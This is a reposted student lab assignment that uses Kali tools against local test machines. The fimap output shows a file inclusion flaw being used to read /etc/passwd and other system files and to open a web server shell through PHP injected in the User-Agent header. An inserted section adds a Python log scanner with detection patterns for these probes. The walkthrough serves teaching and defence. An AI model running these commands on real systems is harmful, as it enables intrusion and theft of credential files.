20169216 Network Attack and Defense Technology: Assignment 4

Basic use of OpenVAS

The following uses OpenVAS to scan the Metasploitable_Ubuntu target for vulnerabilities and analyze the results:
[screenshots]

The host report generated at the end, as a PDF document:
[screenshot]

Web vulnerability scanners Golismero and Nikto

golismero scan 192.168.136.128

Tools for collecting system information on the local host

unix-privesc-check standard
lynis --check-all -Q

Web crawling tools

apache-users: list the usernames on an Apache server

apache-users -h 127.0.0.1 -l /usr/share/wordlists/dirbuster/apache-user-enum-2.0.txt -p 80 -s 0 -e 403 -t 10

cutycapt: take a quick screenshot of a web page

cutycapt --url=http://www.baidu.com/ --out=baidu.png

dirb: scan a website's directories

dirb http://www.baidu.com/

dirbuster: graphical tool for website directory scanning


Web vulnerability scanning

WebDAV vulnerability probing

cadaver


root@kali:~# cadaver http://192.168.136.130/dav/
dav:/dav/> help
Available commands: 
 ls         cd         pwd        put        get        mget       mput       
 edit       less       mkcol      cat        delete     rmcol      copy       
 move       lock       unlock     discover   steal      showlocks  version    
 checkin    checkout   uncheckout history    label      propnames  chexec     
 propget    propdel    propset    search     set        open       close      
 echo       quit       unset      lcd        lls        lpwd       logout     
 help       describe   about      
Aliases: rm=delete, mkdir=mkcol, mv=move, cp=copy, more=less, quit=exit=bye

davtest


root@kali:~# davtest -url http://192.168.136.130/dav/
********************************************************
 Testing DAV connection
OPEN            SUCCEED:                http://192.168.136.130/dav
********************************************************
NOTE    Random string for this session: L9w03FLF1
********************************************************
 Creating directory
MKCOL           SUCCEED:                Created http://192.168.136.130/dav/DavTestDir_L9w03FLF1
********************************************************
 Sending test files

Viewing the files on the system gives the following result:
[screenshot]

File inclusion vulnerability testing

fimap

First, look at the vulnerabilities that already exist in msf:
[screenshots]

root@kali:~# fimap -u 'http://192.168.136.130/lfi.php?page=index.php' --force-run
fimap v.1.00_svn (My life for Aiur)
:: Automatic LFI/RFI scanner and exploiter
:: by Iman Karim (fimap.dev@gmail.com)

SingleScan is testing URL: 'http://192.168.136.130/lfi.php?page=index.php'
[05:57:09] [OUT] Inspecting URL 'http://192.168.136.130/lfi.php?page=index.php'...
[05:57:09] [INFO] Fiddling around with URL...
[05:57:09] [OUT] [PHP] Possible file inclusion found! -> 'http://192.168.136.130/lfi.php?page=IzIjx0Ao' with Parameter 'page'.
[05:57:09] [OUT] [PHP] Identifying Vulnerability 'http://192.168.136.130/lfi.php?page=index.php' with Parameter 'page'...
[05:57:09] [INFO] Scriptpath received: '/var/www'
[05:57:09] [INFO] Operating System is 'Unix-Like'.
[05:57:09] [INFO] Testing file '/etc/passwd'...
[05:57:09] [INFO] Testing file '/proc/self/environ'...
[05:57:09] [INFO] Testing file 'php://input'...
[05:57:09] [INFO] Testing file '/var/log/apache2/access.log'...
[05:57:09] [INFO] Testing file '/var/log/apache/access.log'...
[05:57:09] [INFO] Testing file '/var/log/httpd/access.log'...
[05:57:09] [INFO] Testing file '/var/log/apache2/access_log'...
[05:57:09] [INFO] Testing file '/var/log/apache/access_log'...
[05:57:09] [INFO] Testing file '/var/log/httpd/access_log'...
[05:57:09] [INFO] Testing file '/apache/logs/access.log'...
[05:57:09] [INFO] Testing file '/apache/logs/access_log'...
[05:57:09] [INFO] Testing file '/apache2/logs/access.log'...
[05:57:09] [INFO] Testing file '/apache2/logs/access_log'...
[05:57:09] [INFO] Testing file '/etc/httpd/logs/access_log'...
[05:57:10] [INFO] Testing file '/etc/httpd/logs/access.log'...
[05:57:10] [INFO] Testing file '/var/httpd/logs/access_log'...
[05:57:10] [INFO] Testing file '/var/httpd/logs/access.log'...
[05:57:10] [INFO] Testing file '/var/www/logs/access_log'...
[05:57:10] [INFO] Testing file '/var/www/logs/access.log'...
[05:57:10] [INFO] Testing file '/usr/local/apache/logs/access_log'...
[05:57:10] [INFO] Testing file '/usr/local/apache/logs/access.log'...
[05:57:10] [INFO] Testing file '/usr/local/apache2/logs/access_log'...
[05:57:10] [INFO] Testing file '/usr/local/apache2/logs/access.log'...
[05:57:10] [INFO] Testing file '/var/log/access_log'...
[05:57:10] [INFO] Testing file '/var/log/access.log'...
[05:57:10] [INFO] Testing file '/logs/access.log'...
[05:57:10] [INFO] Testing file '/logs/access_log'...
[05:57:10] [INFO] Testing file '/opt/lampp/logs/access_log'...
[05:57:10] [INFO] Testing file '/opt/lampp/logs/access.log'...
[05:57:10] [INFO] Testing file '/opt/xampp/logs/access.log'...
[05:57:10] [INFO] Testing file '/opt/xampp/logs/access_log'...
[05:57:10] [INFO] Testing file '/var/log/auth.log'...
[05:57:10] [INFO] Testing file '/var/log/secure'...
[05:57:10] [INFO] Testing file 'http://www.tha-imax.de/fimap_testfiles/test'...
##################################################################
#[1] Possible PHP-File Inclusion                                 #
##################################################################
#::REQUEST                                                       #
#  [URL]        http://192.168.136.130/lfi.php?page=index.php    #
#  [HEAD SENT]                                                   #
#::VULN INFO                                                     #
#  [GET PARAM]  page                                             #
#  [PATH]       /var/www                                         #
#  [OS]         Unix                                             #
#  [TYPE]       Absolute Clean                                   #
#  [TRUNCATION] No Need. It's clean.                             #
#  [READABLE FILES]                                              #
#                   [0] /etc/passwd                              #
#                   [1] /proc/self/environ                       #
#                   [2] /var/log/auth.log                        #
##################################################################
root@kali:~# clear
root@kali:~# fimap -x --force-run
fimap v.1.00_svn (My life for Aiur)
:: Automatic LFI/RFI scanner and exploiter
:: by Iman Karim (fimap.dev@gmail.com)

###########################
#:: List of Domains ::    #
###########################
#[1] 192.168.136.130      #
#[q] Quit                 #
###########################
Choose Domain: 1
#####################################################################################################
#:: FI Bugs on '192.168.136.130' ::                                                                 #
#####################################################################################################
#[1] URL: '/lfi.php?page=index.php' injecting file: '/proc/self/environ' using GET-param: 'page'    #
#[2] URL: '/lfi.php?page=index.php' injecting file: '/var/log/auth.log' using GET-param: 'page'     #
#[q] Quit                                                                                           #
#####################################################################################################
Choose vulnerable script: 1
[06:01:09] [INFO] Testing PHP-code injection thru User-Agent...
[06:01:09] [OUT] PHP Injection works! Testing if execution works...
[06:01:09] [INFO] Testing execution thru 'popen[b64]'...
[06:01:09] [OUT] Execution thru 'popen[b64]' works!
####################################################
#:: Available Attacks - PHP and SHELL access ::    #
####################################################
#[1] Spawn fimap shell                             #
#[2] Spawn pentestmonkey's reverse shell           #
#[3] [Test Plugin] Show some info                  #
#[q] Quit                                          #
####################################################
Choose Attack: 1
Please wait - Setting up shell (one request)...
-------------------------------------------
Welcome to fimap shell!
Better don't start interactive commands! ;)
Also remember that this is not a persistent shell.
Every command opens a new shell and quits it after that!
Enter 'q' to exit the shell.
-------------------------------------------
fishell@www-data:/var/www$>
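
The davtest and fimap runs above both leave recognisable traces in the target's web server access log. As an added example (not part of the original post or of either tool), the Python code below flags those traces in Apache combined-format log lines; the sample lines, client addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache "combined" log line; the User-Agent may contain backslash-escaped quotes.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+(?: "[^"]*" "(?P<ua>(?:[^"\\]|\\.)*)")?')

# Values shaped like fimap's probes: absolute path, wrapper/remote URL, traversal, NUL.
LFI_VALUE = re.compile(r'^/|^[a-z][a-z0-9+.-]*://|\.\./|\x00', re.I)
PHP_TAG = re.compile(r'<\?(?:php|=)', re.I)
DAV_WRITE = {"MKCOL", "PUT", "DELETE", "MOVE", "COPY", "PROPPATCH"}

def classify(line):
    """Return (client_ip, [finding, ...]) for one log line, or None if unparsable."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    findings = []
    # parse_qsl percent-decodes, so encoded and plain probes look the same here.
    for name, value in parse_qsl(urlsplit(m["target"]).query, keep_blank_values=True):
        if LFI_VALUE.search(value):
            findings.append("lfi-probe:" + name)
    if PHP_TAG.search(m["ua"] or ""):
        findings.append("php-in-user-agent")
    if m["method"] in DAV_WRITE and m["status"].startswith("2"):
        findings.append("webdav-write-accepted:" + m["method"])
    return m["ip"], findings

def scan(log_text):
    """Return {client_ip: sorted unique findings} for clients with any finding."""
    report = {}
    for line in log_text.splitlines():
        result = classify(line)
        if result and result[1]:
            report.setdefault(result[0], set()).update(result[1])
    return {ip: sorted(found) for ip, found in report.items()}

# Constructed sample lines (not from the page); 192.0.2.x is a documentation range.
SAMPLE_LOG = r'''
192.0.2.20 - - [25/Mar/2017:05:57:09 -0400] "GET /lfi.php?page=index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.0.2.10 - - [25/Mar/2017:05:57:09 -0400] "GET /lfi.php?page=%2Fetc%2Fpasswd HTTP/1.1" 200 1804 "-" "Mozilla/5.0"
192.0.2.10 - - [25/Mar/2017:05:57:09 -0400] "GET /lfi.php?page=php%3A%2F%2Finput HTTP/1.1" 200 90 "-" "Mozilla/5.0"
192.0.2.10 - - [25/Mar/2017:06:01:09 -0400] "GET /lfi.php?page=/proc/self/environ HTTP/1.1" 200 700 "-" "<?php /* constructed placeholder */ ?>"
192.0.2.10 - - [25/Mar/2017:05:40:11 -0400] "MKCOL /dav/DavTestDir_example HTTP/1.1" 201 300 "-" "-"
192.0.2.20 - - [25/Mar/2017:05:40:12 -0400] "PUT /dav/notes.txt HTTP/1.1" 403 280 "-" "-"
'''

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

A rejected write (the 403 PUT) and an ordinary `page=index.php` request produce no finding, so only the probing client appears in the report.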

Web application vulnerability scanners

grabber

skipfish

uniscan WVS

wpscan

W3af

wapiti

webshag

websploit

Network sniffing tools

wireshark

Below, the attacker machine uses an nmap SYN probe to check whether the target is online, while the target captures the packets with Wireshark:
[screenshots]

Reposted from: https://www.cnblogs.com/q-z-y/p/6607940.html
